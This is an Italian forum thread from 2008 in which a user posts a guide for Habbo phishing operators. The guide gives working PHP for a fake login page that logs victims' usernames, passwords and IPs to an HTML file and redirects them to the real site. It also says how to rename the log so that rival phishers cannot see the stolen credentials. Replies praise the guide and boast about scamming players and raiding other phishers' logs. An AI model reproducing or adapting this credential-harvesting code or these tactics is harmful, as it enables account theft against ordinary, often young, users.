Guida Privacy sui vostri fake login

DarkDead

Utente Esperto
Autore del topic
24 Giugno 2008
1.394
0
Miglior risposta
0
Raga Penso di non essere l'unico ad aver avuto questo problema, ma vi ricordo che se qualcuno sa il vostro fake login può benissimo guardare le vostre vittime
x esempio io ho un sito
Perfavore, Entra oppure Registrati per vedere i Link!
e uno conoscendo il vostro dominio può vedere le vostre vittime su vostrodominio.altervista.org/log.html

Ma noi nn vogliamo che questo succeda vero?

bene prendere il file php del vostro fake, apritelo con un qualsiasi mezzo per modificare il contenuto osservando bene questo spoiler

$habbo = $_POST['habbo'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$f = fopen("log.html", "a");
fwrite ($f, 'Nome Habbo: <b>['.$habbo.']</b> Password: <b>['.$password.']</b> IP: <b>['.$ip.']<b/><br>');
fclose($f);
header("Location: http://www.habbo.it/client");

Bene, modificate la riga $f = fopen("log.html", "a"); con $f = fopen("nome della pagina da visualizzare.html", "a");

Esempio
$f = fopen("ciuppa.html", "a"); quindi le passw si visualizzeranno su mio sito.altervista.org/ciuppa.html

xrò ricordatevi di modificare anche il nome del file html, il nome del file dipende dal nome che avete deciso di dare alla riga personalizzata $f = fopen("ciuppa.html", "a");

Esempio, io ho ciuppa.html? allora il file html da caricare su file zilla si chiamerà ciuppa.html spero d esservi stato utile :emoji_smiley:

p.s vi consiglio smpr di salvarvi su un blocco note nel vostor desktop le passw dei fake login
 
Ultima modifica:
lol e ke kavolo a me retroserver mi ha fregato così
 
lol io già un anno che faccio cosi xd.. pensavo che tt lo sapessero fare... se no postavo una guida xd

cmq bella guida bravo ;)
 
-.- senza offesa si vede che sei nuovo.
Non hai pensato che uno che se ne intende di php non ti abbia già preceduto ?

Questa guida se non sbaglio la postai io circvaq 1 anno fà °.° vbb in tutti i modi riaiutiamo i nabboni xDfar qualcosa si buono ^^

Ciao.
 
Ottima guida.

Ci fregherai con questo metodo, ma poichè tra poco sarò maggiorenne, mi basterebbe poco segnalare alla Polizia Postale Online il tuo sito di Phishing, per fartelo eliminare e farti ricevere una bella multina XD

LoL shifty
 
Ottima guida.

Ci fregherai con questo metodo, ma poichè tra poco sarò maggiorenne, mi basterebbe poco segnalare alla Polizia Postale Online il tuo sito di Phishing, per fartelo eliminare e farti ricevere una bella multina XD

LoL shifty

Alberto ma sei tornato?
oppure hai scritto questo post prima di andartene? huh

cmq Bravo...
io guardavo nei siti degli altri xD
 
Ultima modifica:
Alberto ma sei tornato?
oppure hai scritto questo post prima di andartene? huh

cmq Bravo
io guardavo nei siti degli altri xD

mmh non sono tornato, chi ti ha detto che sono tornato? xD
sto solo pubblicando risposte, sto facendo qualcosa di male?!' xD LoL:cettu:
 
lòl una volta c'era un fake, mi pare si kiamasse borsellinopieno.altervista.org (ora bannato) in cui c'erano tntissime persone ke usavano qll x scammare

un giorno stavo dentro il pg si uno e qst era appena uscito

eravamo in 5 a cercare di fregergli i furni + in fretta possibile XD

cmq è vero nn lo sanno molte xsone xk + ke altro ki usa i fake nn se ne intende di programmazione web, avrò + o - 10 fake cn i file delle pass non cambiati, ma credo ke cn qst guida lo cambieranno >.<
 
qui le cose + elemenati vanno anke postate nell'informatica serve tutto ciò conosci cmq in questa discussione c'è un mega nabbo e nn fcc nomi lol